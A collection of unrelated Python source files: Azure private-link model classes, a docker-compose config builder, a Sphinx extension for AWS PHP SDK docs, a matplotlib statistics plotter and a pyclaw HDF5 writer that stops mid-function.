:ivar next_link: Link to retrieve next page of results.
:vartype next_link: str
"""
_validation = {
'value': {'readonly': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[PrivateEndpointConnection]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpointConnectionListResult, self).__init__(**kwargs)
self.value = None
self.next_link = None
class PrivateEndpointProperty(msrest.serialization.Model):
"""Private endpoint which the connection belongs to.
:param id: Resource id of the private endpoint.
:type id: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpointProperty, self).__init__(**kwargs)
self.id = kwargs.get('id', None)
class PrivateLinkResource(ProxyResource):
"""A private link resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Azure resource Id.
:vartype id: str
:ivar name: Azure resource name.
:vartype name: str
:ivar type: Azure resource type.
:vartype type: str
:ivar group_id: The private link resource group id.
:vartype group_id: str
:ivar required_members: The private link resource required member names.
:vartype required_members: list[str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'group_id': {'readonly': True},
'required_members': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'group_id': {'key': 'properties.groupId', 'type': 'str'},
'required_members': {'key': 'properties.requiredMembers', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkResource, self).__init__(**kwargs)
self.group_id = None
self.required_members = None
class PrivateLinkResourceListResult(msrest.serialization.Model):
"""A list of private link resources.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: Array of results.
:vartype value: list[~$(python-base-namespace).v2019_10_17.models.PrivateLinkResource]
:ivar next_link: Link to retrieve next page of results.
:vartype next_link: str
"""
_validation = {
'value': {'readonly': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[PrivateLinkResource]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkResourceListResult, self).__init__(**kwargs)
self.value = None
self.next_link = None
class PrivateLinkServiceConnectionStateProperty(msrest.serialization.Model):
"""State of the private endpoint connection.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param status: Required. The private link service connection status.
:type status: str
:param description: Required. The private link service connection description.
:type description: str
:ivar actions_required: The actions required for private link service connection.
:vartype actions_required: str
"""
_validation = {
'status': {'required': True},
'description': {'required': True},
'actions_required': {'readonly': True},
}
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'actions_required': {'key': 'actionsRequired', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkServiceConnectionStateProperty, self).__init__(**kwargs)
self.status = kwargs['status']
self.description = kwargs['description']
self.actions_required = None
class ScopedResource(ProxyResource):
"""A private link scoped resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Azure resource Id.
:vartype id: str
:ivar name: Azure resource name.
:vartype name: str
:ivar type: Azure resource type.
:vartype type: str
:param linked_resource_id: The resource id of the scoped Azure monitor resource.
:type linked_resource_id: str
:ivar provisioning_state: State of the private endpoint connection.
:vartype provisioning_state: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'provisioning_state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'linked_resource_id': {'key': 'properties.linkedResourceId', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ScopedResource, self).__init__(**kwargs)
self.linked_resource_id = kwargs.get('linked_resource_id', None)
self.provisioning_state = None
class ScopedResourceListResult(msrest.serialization.Model):
"""A list of scoped resources in a private link scope.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: Array of results.
:vartype value: list[~$(python-base-namespace).v2019_10_17.models.ScopedResource]
:ivar next_link: Link to retrieve next page of results.
:vartype next_link: str
"""
_validation = {
'value': {'readonly': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[ScopedResource]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ScopedResourceListResult, self).__init__(**kwargs)
self.value = None
self.next_link = None
class TagsResource(msrest.serialization.Model):
"""A container holding only the Tags for a resource, allowing the user to update the tags on a PrivateLinkScope instance.
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
"""
_attribute_map = {
'tags': {'key': 'tags', 'type': '{str}'},
}
def __init__(
self,
**kwargs
):
super(TagsResource, self).__init__(**kwargs)
self.tags = kwargs.get('tags', None)
| |
"""Docker module
This module includes classes for docker
"""
import subprocess
import yaml
class DockerImage(object):
"""Representation of a Docker Image
This class represents a Docker Image
Attributes:
image_name: name of the image
"""
def __init__(self, image_name):
"""Create a new instance"""
self.__image_name = image_name
def export_image(self, output_filename):
"""Exports a the image to the given filename
Args:
output_filename: filename for the output of the image
"""
# download image from Docker Hub
command = ["docker", "pull", self.__image_name]
subprocess.check_call(command)
# export image
command = ["docker", "save", "-o", output_filename, self.__image_name]
subprocess.check_call(command)
class DockerComposeConfig(object):
"""Representation of the docker-compose.yml config
This class is a representation of the configuration for docker-compose.yml
It consists of multiple DockerServiceConfig objects.
Usage:
config = DockerComposeConfig
config.add_service(docker_service_1)
config.add_service(docker_service_2)
config.add_network(docker_network_1)
config.add_volume(docker_volume_1)
config.create_yaml_output()
"""
def __init__(self):
"""Create a new instance"""
self.__docker_services = []
self.__docker_networks = []
self.__docker_volumes = []
def add_service(self, docker_service_config):
"""Adds a new DockerServiceConfig object
Args:
docker_service_config: the new DockerServiceConfig object
Returns:
None
"""
self.__docker_services.append(docker_service_config)
def add_network(self, docker_network_config):
"""Adds a new DockerNetworkConfig object
Args:
docker_network_config: the new DockerNetworkConfig object
Returns:
None
"""
self.__docker_networks.append(docker_network_config)
def add_volumes(self, volumenames):
"""Adds a list of named volumes to declare
Args:
volumenames: list with names of named volumes
Returns:
None
"""
self.__docker_volumes = list(set(self.__docker_volumes + volumenames))
def create_yaml_output(self):
"""Creates YAML output for docker-compose.yml
This function creates the output for docker-compose.xml for the given
DockerService objects
Returns:
String with YAML output for docker-compose.yml
"""
yaml_data = {}
yaml_data["version"] = "2.1"
yaml_data["services"] = {}
yaml_data["networks"] = {}
yaml_data["volumes"] = {}
for docker_service in self.__docker_services:
docker_service_name = docker_service.get_name()
docker_service_config = docker_service.get_config_dict()
yaml_data["services"][docker_service_name] = docker_service_config
for docker_network in self.__docker_networks:
docker_network_name = docker_network.get_name()
docker_network_config = docker_network.get_config_dict()
yaml_data["networks"][docker_network_name] = docker_network_config
for docker_volume in self.__docker_volumes:
yaml_data["volumes"][docker_volume] = {}
return yaml.safe_dump(yaml_data, default_flow_style=False)
class DockerServiceConfig(object):
"""Representation of a docker service configuration
This class represents the configuration of a docker service configuration
Attributes:
name: name of the container
"""
def __init__(self, name):
"""Initialization"""
self.__name = name
self.__image = ""
self.__dependencies = []
self.__volumes = []
self.__ports = []
self.__environment = {}
self.__buildargs = {}
self.__privileged = False
self.__restart_policy = "no"
self.__build = None
self.__network_mode = None
def get_name(self):
"""Returns the container name"""
return self.__name
def get_image(self):
"""Returns the image name"""
return self.__image
def set_image(self, image):
"""Sets the image of the container
Args:
image: the image name of the container
"""
self.__image = image
def set_privileged(self, privileged):
"""Sets if the container is privileged
Args:
privileged: boolean flag, if it is a privileged container
"""
self.__privileged = privileged
def set_restart_policy(self, policy):
"""Sets the containers restart policy
Args:
policy: String with restart policy
"""
self.__restart_policy = policy
def add_dependency(self, target):
"""Adds a dependency to another container
Args:
target: target container name
"""
self.__dependencies.append(target)
def add_volume(self, volume_definition):
"""Adds a volume definition.
Args:
volume_definition: Docker volume definition
"""
self.__volumes.append(volume_definition)
def add_port(self, port_definition):
"""Adds a port definition.
Args:
port_definition: Docker port definition
"""
self.__ports.append(port_definition)
def add_environment(self, env_variable, env_value):
"""Adds an environment variable
Args:
env_variable: name of the environment variable
env_value: value of the environment variable
"""
self.__environment[env_variable] = env_value
def add_buildarg(self, arg, value):
"""Adds a build argument
Args:
arg: name of the build argument
value: value of the build argument
"""
self.__buildargs[arg] = value
def set_build_path(self, build_path):
"""Sets the build option with the given path
Args:
build_path: path to Dockerfile
"""
self.__build = build_path
def set_network_mode(self, network_mode):
"""Sets the network_mode
Args:
network_mode: Docker Compose network mode option
"""
self.__network_mode = network_mode
def get_config_dict(self):
"""get the configuration as dict
Returns the docker service configuration as dict
"""
output = {}
output["image"] = self.__image
output["depends_on"] = self.__dependencies
output["privileged"] = self.__privileged
output["restart"] = self.__restart_policy
output["environment"] = self.__environment
output["volumes"] = self.__volumes
output["ports"] = self.__ports
if self.__build:
output["build"] = {}
output["build"]["context"] = self.__build
if self.__buildargs:
output["build"]["args"] = self.__buildargs
if self.__network_mode:
output["network_mode"] = self.__network_mode
return output
class DockerNetworkConfig(object):
def __init__(self, name):
"""Initialization"""
self.__name = name
self.__ipam_config = []
self.__ipv6_enable = None
self.__driver = None
self.__driver_opts = {}
def get_name(self):
"""Returns the container name"""
return self.__name
def add_ip_config(self, network, gateway=None):
ip_config = {}
ip_config["subnet"] = network
if gateway is not None:
ip_config["gateway"] = gateway
self.__ipam_config.append(ip_config)
def set_ipv6_enable(self, ipv6_enable):
self.__ipv6_enable = ipv6_enable
def set_driver(self, driver):
self.__driver = driver
def set_driver_opts(self, driver_opts):
self.__driver_opts = driver_opts
def get_config_dict(self):
"""get the configuration as dict
Returns the docker network configuration as dict
"""
output = {}
if self.__ipv6_enable:
output["enable_ipv6"] = self.__ipv6_enable
if self.__driver:
output["driver"] = self.__driver
if self.__driver_opts:
output["driver_opts"] = self.__driver_opts
if self.__ipam_config:
output["ipam"] = {}
output["ipam"]["config"] = self.__ipam_config
return output
| |
import os, re, subprocess, json, collections
from sphinx.addnodes import toctree
from docutils import io, nodes, statemachine, utils
from docutils.parsers.rst import Directive
from jinja2 import Environment, PackageLoader
# Maintain a cache of previously loaded examples
example_cache = {}
# Maintain a cache of previously loaded service descriptions
description_cache = {}
def setup(app):
"""
see: http://sphinx.pocoo.org/ext/appapi.html
this is the primary extension point for Sphinx
"""
from sphinx.application import Sphinx
if not isinstance(app, Sphinx): return
app.add_role('regions', regions_role)
app.add_directive('service', ServiceIntro)
app.add_directive('apiref', ServiceApiRef)
app.add_directive('indexlinks', ServiceIndexLinks)
app.add_directive('example', ExampleDirective)
def regions_role(name, rawtext, text, lineno, inliner, options={}, content={}):
"""Inserts a list of regions available to a service name
Returns 2 part tuple containing list of nodes to insert into the
document and a list of system messages. Both are allowed to be
empty.
:param name: The role name used in the document.
:param rawtext: The entire markup snippet, with role.
:param text: The text marked with the role.
:param lineno: The line number where rawtext appears in the input.
:param inliner: The inliner instance that called us.
:param options: Directive options for customization.
:param content: The directive content for customization.
"""
try:
service_name = str(text)
if not service_name:
raise ValueError
app = inliner.document.settings.env.app
node = make_regions_node(rawtext, app, str(service_name), options)
return [node], []
except ValueError:
msg = inliner.reporter.error(
'The service name "%s" is invalid; ' % text, line=lineno)
prb = inliner.problematic(rawtext, rawtext, msg)
return [prb], [msg]
def get_regions(service_name):
"""Get the regions for a service by name
Returns a list of regions
:param service_name: Retrieve regions for this service by name
"""
return load_service_description(service_name)['regions'].keys()
def make_regions_node(rawtext, app, service_name, options):
"""Create a list of regions for a service name
:param rawtext: Text being replaced with the list node.
:param app: Sphinx application context
:param service_name: Service name
:param options: Options dictionary passed to role func.
"""
regions = get_regions(service_name)
return nodes.Text(", ".join(regions))
class ServiceDescription():
"""
Loads the service description for a given source file
"""
def __init__(self, service):
self.service_name = service
self.description = self.load_description(self.determine_filename())
def determine_filename(self):
"""Determines the filename to load for a service"""
# Determine the path to the aws-config
path = os.path.abspath("../src/Aws/Common/Resources/aws-config.php")
self.config = self.__load_php(path)
# Iterate over the loaded dictionary and see if a matching service exists
for key in self.config["services"]:
alias = self.config["services"][key].get("alias", "")
if key == self.service_name or alias == self.service_name:
break
else:
raise ValueError("No service matches %s" % (self.service_name))
# Determine the name of the client class to load
class_path = self.config["services"][key]["class"].replace("\\", "/")
client_path = os.path.abspath("../src/" + class_path + ".php")
contents = open(client_path, 'r').read()
# Determine the current version of the client (look at the LATEST_API_VERSION constant value)
version = re.search("LATEST_API_VERSION = '(.+)'", contents).groups(0)[0]
# Determine the name of the service description used by the client
matches = re.search("__DIR__ \. '/Resources/(.+)\.php'", contents)
description = matches.groups(0)[0] % (version)
# Strip the filename of the client and determine the description path
service_path = "/".join(client_path.split(os.sep)[0:-1])
service_path += "/Resources/" + description + ".php"
return service_path
def load_description(self, path):
"""Determines the filename to load for a service
:param path: Path to a service description to load
"""
description = self.__load_php(path)
if 'regions' not in description:
description['regions'] = {}
return description
def __load_php(self, path):
"""Load a PHP script that returns an array using JSON
:param path: Path to the script to load
"""
path = os.path.abspath(path)
# Make command to each environment Linux/Mac and Windows
if os.name == 'nt':
sh = 'php -r \"$c = include \'' + path + '\'; echo json_encode($c);\"'
else:
sh = 'php -r \'$c = include "' + path + '"; echo json_encode($c);\''
loaded = subprocess.check_output(sh, shell=True)
return json.loads(loaded)
def __getitem__(self, i):
"""Allows access to the service description items via the class"""
return self.description.get(i)
def load_service_description(name):
if name not in description_cache:
description_cache[name] = ServiceDescription(name)
return description_cache[name]
class ServiceDescriptionDirective(Directive):
"""
Base class for directives that use information from service descriptions
"""
required_arguments = 1
optional_arguments = 1
final_argument_whitespace = True
def run(self):
if len(self.arguments) == 2:
api_version = self.arguments[1].strip()
else:
api_version = ""
service_name = self.arguments[0].strip()
service_description = load_service_description(service_name)
rawtext = self.generate_rst(service_description, api_version)
tab_width = 4
include_lines = statemachine.string2lines(
rawtext, tab_width, convert_whitespace=1)
self.state_machine.insert_input(
include_lines, os.path.abspath(__file__))
return []
def get_service_doc_url(self, namespace):
"""Determine the documentation link for a service"""
namespace = namespace.lower()
if namespace == "sts":
return "http://aws.amazon.com/documentation/iam/"
else:
return "http://aws.amazon.com/documentation/" + namespace
def get_api_ref_url(self, namespace):
"""Determine the PHP API documentation link for a service"""
return "http://docs.aws.amazon.com/aws-sdk-php/latest/class-Aws." + namespace + "." + namespace + "Client.html"
def get_locator_name(self, name):
"""Determine the service locator name for an endpoint"""
return name
class ServiceIntro(ServiceDescriptionDirective):
"""
Creates a service introduction to inject into a document
"""
def generate_rst(self, d, api_version):
rawtext = ""
scalar = {}
# Grab all of the simple strings from the description
for key in d.description:
if isinstance(d[key], str) or isinstance(d[key], unicode):
scalar[key] = d[key]
# Add substitutions for top-level data in a service description
rawtext += ".. |%s| replace:: %s\n\n" % (key, scalar[key])
# Determine the doc URL
docs = self.get_service_doc_url(d["namespace"])
# Determine the "namespace" used for linking to API docs
if api_version:
apiVersionSuffix = "_" + api_version.replace("-", "_")
else:
apiVersionSuffix = ""
env = Environment(loader=PackageLoader('aws', 'templates'))
template = env.get_template("client_intro")
rawtext += template.render(
scalar,
regions=get_regions(d["namespace"]),
doc_url=docs,
specifiedApiVersion=api_version,
apiVersionSuffix=apiVersionSuffix)
return rawtext
class ServiceApiRef(ServiceDescriptionDirective):
"""
Inserts a formatted PHPUnit example into the source
"""
def generate_rst(self, d, api_version):
rawtext = ""
scalar = {}
# Sort the operations by key
operations = collections.OrderedDict(sorted(d.description['operations'].items()))
# Grab all of the simple strings from the description
for key in d.description:
if isinstance(d[key], str) or isinstance(d[key], unicode):
scalar[key] = d[key]
# Add substitutions for top-level data in a service description
rawtext += ".. |%s| replace:: %s\n\n" % (key, scalar[key])
# Add magic methods to each operation
for key in operations:
operations[key]['magicMethod'] = key[0].lower() + key[1:]
# Set the ordered dict of operations on the description
d.description['operations'] = operations
# Determine the "namespace" used for linking to API docs
if api_version:
apiVersionSuffix = "_" + api_version.replace("-", "_")
else:
apiVersionSuffix = ""
env = Environment(loader=PackageLoader('aws', 'templates'))
template = env.get_template("api_reference")
rawtext += template.render(
scalar,
description=d.description,
regions=get_regions(d["namespace"]),
apiVersionSuffix=apiVersionSuffix)
return rawtext
class ServiceIndexLinks(ServiceDescriptionDirective):
"""
Inserts a formatted PHPUnit example into the source
"""
def generate_rst(self, service_description, api_version):
d = service_description.description
service_name = d["serviceFullName"]
if "serviceAbbreviation" in d:
service_name = d["serviceAbbreviation"]
rawtext = "* :doc:`Using the " + service_name + " PHP client <service-" + d["namespace"].lower() + ">`\n";
rawtext += "* `PHP API reference <" + self.get_api_ref_url(d["namespace"]) + ">`_\n";
#rawtext += "* `General service documentation for " + service_name + " <" + self.get_service_doc_url(d["namespace"]) + ">`_\n";
return rawtext
class ExampleDirective(Directive):
"""
Inserts a formatted PHPUnit example into the source
"""
# Directive configuration
required_arguments = 2
optional_arguments = 0
final_argument_whitespace = True
def run(self):
self.end_function = " }\n"
self.begin_tag = " // @begin\n"
self.end_tag = " // @end\n"
example_file = self.arguments[0].strip()
example_name = self.arguments[1].strip()
if not example_name:
raise ValueError("Must specify both an example file and example name")
contents = self.load_example(example_file, example_name)
rawtext = self.generate_rst(contents)
tab_width = 4
include_lines = statemachine.string2lines(
rawtext, tab_width, convert_whitespace=1)
self.state_machine.insert_input(
include_lines, os.path.abspath(__file__))
return []
def load_example(self, example_file, example_name):
"""Loads the contents of an example and strips out non-example parts"""
key = example_file + '.' + example_name
# Check if this example is cached already
if key in example_cache:
return example_cache[key]
# Not cached, so index the example file functions
path = os.path.abspath(__file__ + "/../../../../tests/Aws/Tests/" + example_file)
f = open(path, 'r')
in_example = False
capturing = False
buffer = ""
# Scan each line of the file and create example hashes
for line in f:
if in_example:
if line == self.end_function:
if in_example:
example_cache[in_example] = buffer
buffer = ""
in_example = False
elif line == self.begin_tag:
# Look for the opening // @begin tag to begin capturing
buffer = ""
capturing = True
elif line == self.end_tag:
# Look for the optional closing tag to stop capturing
capturing = False
elif capturing:
buffer += line
elif "public function test" in line:
# Grab the function name from the line and keep track of the
# name of the current example being captured
current_name = re.search('function (.+)\s*\(', line).group(1)
in_example = example_file + "." + current_name
f.close()
return example_cache[key]
def generate_rst(self, contents):
rawtext = ".. code-block:: php\n\n" + contents
return rawtext
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import matplotlib.pylab as plt
import numpy as np
from collections import defaultdict
import log_to_files
def movingaverage(interval, window_size):
window = np.ones(int(window_size))/float(window_size)
return np.convolve(interval, window, 'valid')
def readlines(filepath):
with open(filepath) as f:
return [float(line.strip()) for line in f]
def read_run_stats(instance_name):
statslist = ["death", "fight", "migration", "reproduction"]
# statslist = ["reproduction"]
island_statslist = ["fitness"] #, "population"] #, "stddevsum", "stddevmin"]
common_data = {}
island_data = []
# if skel stats, remove migration
# statslist.remove("migration")
data = {}
for filename in island_statslist:
filepath = os.path.join(instance_name, filename + ".txt")
# print filepath, readlines(filepath)
try:
data[filename] = readlines(filepath)
except:
print 'exception:', filename, ' stats not present'
island_data.append(data)
for filename in statslist:
filepath = os.path.join(instance_name, filename + ".txt")
# print filepath, readlines(filepath)
try:
common_data[filename] = readlines(filepath)
except:
print 'exception:', filename, ' stats not present'
return common_data, island_data
def read_all_runs_stats(instance_names):
'''
returns statistics from all run instances
from current directory
'''
return [read_run_stats(instance_name) for instance_name in instance_names]
def plot_data(data_tuples, figure_name):
rows = 2
cols = 2
fig, ax = plt.subplots(rows, cols)
for i in range(rows):
for j in range(cols):
if len(data_tuples) > i*rows+j:
label, data = data_tuples[i*rows+j]
ax[i][j].plot(range(len(data)), data)
ax[i][j].set_title(label)
fig.suptitle(figure_name, fontsize=18)
fig.tight_layout()
func_map = dict([('mean', np.mean), ('max', max),
('sum', sum), ('min', min),
('median', np.median),
('spread', lambda elem: max(elem) - min(elem))
])
def get_func(func):
return func_map[func] if type(func) == str else func
def merge_stats(islands, func, stat):
'''
func can be one of: mean, max, min, sum, median
or func can be a function that gets a list of values and returns a
list of islands stats and returns averages of all islands per second
islands is a list of dicts
e.g. [{'fitness': [1,2,3], 'population': [5,5,5]}, {'fitness': [4,5,6], 'population': [7,7,7]}]
'''
func = get_func(func)
groups = [island[stat] for island in islands]
result = [func(e) for e in zip(*groups)]
return result
class DataToPlot(object):
"""docstring for DataToPlot"""
def __init__(self, data, attr, scale='linear', func=None, label=None):
if attr != "fitness":
window = 30
data = movingaverage(data, window)
self.data = data
self.func = func
self.attr = attr
self.scale = scale
fs = str(func) + ' ' if func is not None else ''
self.label = fs + attr if label is None else label
@classmethod
def from_list(cls, data, func, attr, scale='linear', label=None):
data = merge_stats(data, func, attr)
return cls(data, attr, scale=scale, func=func, label=label)
def __str__(self): return self.pprint(10)
def __repr__(self): return self.pprint(1)
def pprint(self, limit):
s = self.label + ": " + str(self.data[:limit])
s = s if len(self.data) < limit else s + ' ... ' + str(len(self.data) - limit) + ' more'
return s
def plot_data_objs(data_to_plot_list, figure_name, same=False):
rows = 2
cols = 1
topo = figure_name.split(':')[0]
# print "topo:",topo
# print "figname:",figure_name
if same:
fig_id = figure_name.split(':')[-1]
fig, ax = plt.subplots(rows, cols, num=fig_id)
else:
fig, ax = plt.subplots(rows, cols)
for i in range(rows):
# for j in range(cols):
idx = i #*rows+j
if len(data_to_plot_list) > idx:
obj = data_to_plot_list[idx]
if obj.scale == 'log' and max(obj.data) <= 0:
ydata = map(lambda x: -x, obj.data)
else:
ydata = obj.data
ax[idx].plot(range(len(obj.data)), ydata, label=topo, linewidth=2.0)
ax[idx].set_yscale(obj.scale)
ax[idx].set_title(obj.label)
if same:
ax[idx].legend(loc='lower left', shadow=True)
ax[idx].legend().set_visible(False)
# fig.legend(loc='lower left', shadow=True)
if fig._suptitle is None:
suptitle = ':'.join(figure_name.split(':')[1:])
fig.suptitle(suptitle, fontsize=18)
# fig.tight_layout()
def fetch_instance(instance_name):
common, islands = read_run_stats(instance_name)
best_fitness = DataToPlot.from_list(islands, 'max', 'fitness', scale='log')
# sum_population = DataToPlot.from_list(islands, 'sum', 'population')
# spread_population = DataToPlot.from_list(islands, 'spread', 'population')
# stddevmin = DataToPlot.from_list(islands, 'mean', 'stddevmin') #, scale='log')
# stddevsum = DataToPlot.from_list(islands, 'mean', 'stddevsum') #, scale='log')
# subplots_data = [best_fitness, sum_population, spread_population]
subplots_data = [best_fitness] #, sum_population] #, stddevmin, stddevsum]
# common_data = [DataToPlot(data, attr) for attr, data in common.items()]
attr = "reproduction"
common_data = [DataToPlot(common[attr], attr)]
instance_data = [subplots_data[0]] + common_data + subplots_data[1:]
return instance_data
def merge_instances(instances, func):
func = get_func(func)
result = []
for tup in zip(*instances):
example = tup[0]
datas = [elem.data for elem in tup]
data = [func(data) for data in zip(*datas)]
new_label = func.func_name + ' ' + example.label
dtp = DataToPlot(data, example.attr, scale=example.scale, func=example.func, label=new_label)
result.append(dtp)
return result
def plot_stats(instance_names, func, same, plot_label=None):
instances = [fetch_instance(instance_name) for instance_name in instance_names]
result_to_plot = merge_instances(instances, func)
out_dir = instance_names[0].split(os.path.sep)[0]
if plot_label is None:
plot_label = out_dir
# print "instance_names",instance_names
# print "out_dir", out_dir
step = 4 # 4 subplots on a figure
for i in range(0,len(result_to_plot), step):
label = ':'.join([plot_label, func, str(len(instance_names)) + "runs", str(i/step+1)])
plot_data_objs(result_to_plot[i:i+step], label, same)
# show()
def main(instance_names=[], func='mean', same=False, plot_label=None):
# print instance_names
plot_stats(instance_names, func, same, plot_label)
def zeus(directory='.', proj="emas", func='mean'):
for name in os.listdir(directory):
if name.startswith(proj) and not name.endswith('_run'):
logfile = os.path.join(directory, name)
out_dir = logfile + '_run'
log_to_files.parse(logfile, out_dir)
instance_names = [os.path.join(directory,name) for name in os.listdir(directory) if name.endswith('_run')]
return instance_names
def trim_plot_labels(first_instances):
# print "first_instances", first_instances
if len(first_instances) == 1:
return [os.path.sep.join(first_instances[0].split(os.path.sep)[:-1])]
paths_elems = [instance.split(os.path.sep)[:-1] for instance in first_instances]
result = []
for path in zip(*paths_elems):
if not all([path[0] == p for p in path]):
result.append(path)
new_names = zip(*result)
return map(lambda x: os.path.sep.join(list(x)), new_names)
def run():
proj = 'emas'
func = 'mean'
directories = sys.argv[1:]
if not os.path.isdir(sys.argv[-1]):
directories = directories[:-1]
instance_names_in_directories = []
for directory in directories:
logfiles = [os.path.join(directory,name) for name in os.listdir(directory) if name.startswith(proj) and not name.endswith('_run')]
instance_names = [os.path.join(directory,name) for name in os.listdir(directory) if name.endswith('_run')]
if len(logfiles) != len(instance_names):
instance_names = zeus(directory, proj, func)
instance_names_in_directories.append(instance_names)
# print instance_names_in_directories
first_instances = map(lambda x: x[0], instance_names_in_directories)
plot_labels = trim_plot_labels(first_instances)
for instance_names, plot_label in zip(instance_names_in_directories, plot_labels):
if len(plot_label) == 0:
plot_label = None
main(instance_names, func, True, plot_label)
fig, axes = plt.subplots(2, 1, num=1)
ax = axes[0]
l = ax.legend()#.set_visible(False)
# position = 'lower right'
if l is None:
pass
elif l.legendHandles is not None:
position = 'center left'
fig.legend(l.legendHandles, [x._text for x in l.texts], position)
l.set_visible(False)
# fig.tight_layout()
# i=1
if __name__ == '__main__':
# plt.legend()
if len(sys.argv) < 2:
print 'Usage:'
print '\tpython stat_plotter.py {<directory_with_logfiles>|<directory_with_subdirectories} ...'
else:
run()
if os.path.isdir(sys.argv[-1]):
plt.show()
else:
from subprocess import call
call(["mkdir", "-p", "plots"])
ext = "svg"
plt.savefig("plots/"+sys.argv[-1]+"."+ext, bbox_inches='tight')
| |
#!/usr/bin/env python
# encoding: utf-8
r"""
Routines for reading and writing a HDF5 output file
This module reads and writes hdf5 files via either of the following modules:
h5py - http://code.google.com/p/h5py/
PyTables - http://www.pytables.org/moin
It will first try h5py and then PyTables and use the correct calls
according to whichever is present on the system. We recommend that you use
h5py as it is a minimal wrapper to the HDF5 library and will create
To install either, you must also install the hdf5 library from the website:
http://www.hdfgroup.org/HDF5/release/obtain5.html
:Authors:
Kyle T. Mandli (2009-02-13) Initial version
"""
# ============================================================================
# Copyright (C) 2009 Kyle T. Mandli <mandli@amath.washington.edu>
#
# Distributed under the terms of the Berkeley Software Distribution (BSD)
# license
# http://www.opensource.org/licenses/
# ============================================================================
import os,sys
import logging
import numpy as np
import pyclaw.solution
logger = logging.getLogger('io')
# Import appropriate hdf5 package
use_h5py = False
use_PyTables = False
try:
import h5py
use_h5py = True
except:
pass
if use_h5py:
try:
import tables
use_PyTables = True
except:
error_msg = ("Could not import h5py or PyTables, please install " +
"either h5py or PyTables. See the doc_string for more " +
"information.")
raise Exception(error_msg)
if not use_h5py and not use_PyTables:
logging.critical("Could not import h5py or PyTables!")
def write_hdf5(solution,frame,path,file_prefix='claw',write_aux=False,
options={}):
r"""
Write out a Solution to a HDF5 file.
:Input:
- *solution* - (:class:`~pyclaw.solution.Solution`) Pyclaw solution
object to input into
- *frame* - (int) Frame number
- *path* - (string) Root path
- *file_prefix* - (string) Prefix for the file name. ``default = 'claw'``
- *write_aux* - (bool) Boolean controlling whether the associated
auxiliary array should be written out. ``default = False``
- *options* - (dict) Optional argument dictionary, see
`HDF5 Option Table`_
.. _`HDF5 Option Table`:
+-----------------+------------------------------------------------------+
| Key | Value |
+=================+======================================================+
| compression | (None, string ["gzip" | "lzf" | "szip"] or int 0-9) |
| | Enable dataset compression. DEFLATE, LZF and (where |
| | available) SZIP are supported. An integer is |
| | interpreted as a GZIP level for backwards |
| | compatibility. |
+-----------------+------------------------------------------------------+
|compression_opts | (None, or special value) Setting for compression |
| | filter; legal values for each filter type are: |
| | |
| | - *gzip* - (int) 0-9 |
| | - *lzf* - None allowed |
| | - *szip* - (tuple) 2-tuple ('ec'|'nn', even integer |
| | 0-32) |
| | |
| | See the filters module for a detailed description of |
| | each of these filters. |
+-----------------+------------------------------------------------------+
| chunks | (None, True or shape tuple) Store the dataset in |
| | chunked format. Automatically selected if any of the |
| | other keyword options are given. If you don't provide|
| | a shape tuple, the library will guess one for you. |
+-----------------+------------------------------------------------------+
| shuffle | (True/False) Enable/disable data shuffling, which can|
| | improve compression performance. Automatically |
| | enabled when compression is used. |
+-----------------+------------------------------------------------------+
| fletcher32 | (True/False) Enable Fletcher32 error detection; may |
| | be used with or without compression. |
+-----------------+------------------------------------------------------+
"""
# Option parsing
option_defaults = {'compression':None,'compression_opts':None,
'chunks':None,'shuffle':False,'fletcher32':False}
for (k,v) in option_defaults.iteritems():
if options.has_key(k):
exec("%s = options['%s']" % (k,k))
else:
exec('%s = v' % k)
# File name
filename = os.path.join(path,'%s%s.hdf' %
(file_prefix,str(frame).zfill(4)))
# Write out using h5py
if use_h5py:
f = h5py.File(filename,'w')
# For each grid, write out attributes
for grid in solution.grids:
# Create group for this grid
subgroup = f.create_group('grid%s' % grid.gridno)
# General grid properties
for attr in ['t','meqn','mbc','gridno','level']:
if hasattr(grid,attr):
if getattr(grid,attr) is not None:
subgroup.attrs[attr] = getattr(grid,attr)
# Add the dimension names as a attribute
subgroup.attrs['dimensions'] = grid.get_dim_attribute('name')
# Dimension properties
for dim in grid.dimensions:
for attr in ['n','lower','d','upper','mthbc_lower',
'mthbc_upper','units']:
if hasattr(dim,attr):
if getattr(dim,attr) is not None:
attr_name = '%s.%s' % (dim.name,attr)
subgroup.attrs[attr_name] = getattr(dim,attr)
# Write out q
subgroup.create_dataset('q',data=grid.q,
compression=compression,
compression_opts=compression_opts,
chunks=chunks,shuffle=shuffle,
fletcher32=fletcher32)
if write_aux and grid.maux > 0:
subgroup.create_dataset('aux',data=grid.aux,
